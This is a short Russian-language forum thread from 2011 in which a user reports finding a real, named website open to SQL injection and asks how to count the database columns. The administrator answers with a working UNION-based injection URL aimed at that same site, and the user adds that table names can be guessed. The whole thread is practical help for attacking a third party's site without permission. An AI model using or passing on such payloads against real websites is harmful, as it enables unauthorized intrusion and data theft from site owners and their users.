Вы не зашли.
Главная » SQL » SQL injection
#1. POFIGISST Off (6)
Участник
2011.04.04 12:12
Такой вопрос,нашел сайт на котором можно сделать SQL injection,при проверке,база выдает ошибку, http://geneticsandsociety.org/article.php?id=3805' пытаюсь узнать сколько полей в базе,и не получается,просто обновляет страницу,я думал мож мало полей задаю,задал их 500 штук,но система все равно ошибку не выдает,как можно через SQL injection узнать сколько там полей?))
#2. Gemorroj Off (107)
Administrator
2011.04.04 14:02
http://www.geneticsandsociety.org/article.php?id=3805%20OR%201=1%20UNION%20ALL%20SELECT%20DATABASE()#
имя таблицы нужно знать.
#3. POFIGISST Off (6)
Участник
2011.04.04 14:02
Gemorroj я чуть не так делал))Имя таблицы можно подобрать по стандарту))
Страниц: 1
Главная
WEB
PunBB Mod v0.6.2
0.011 s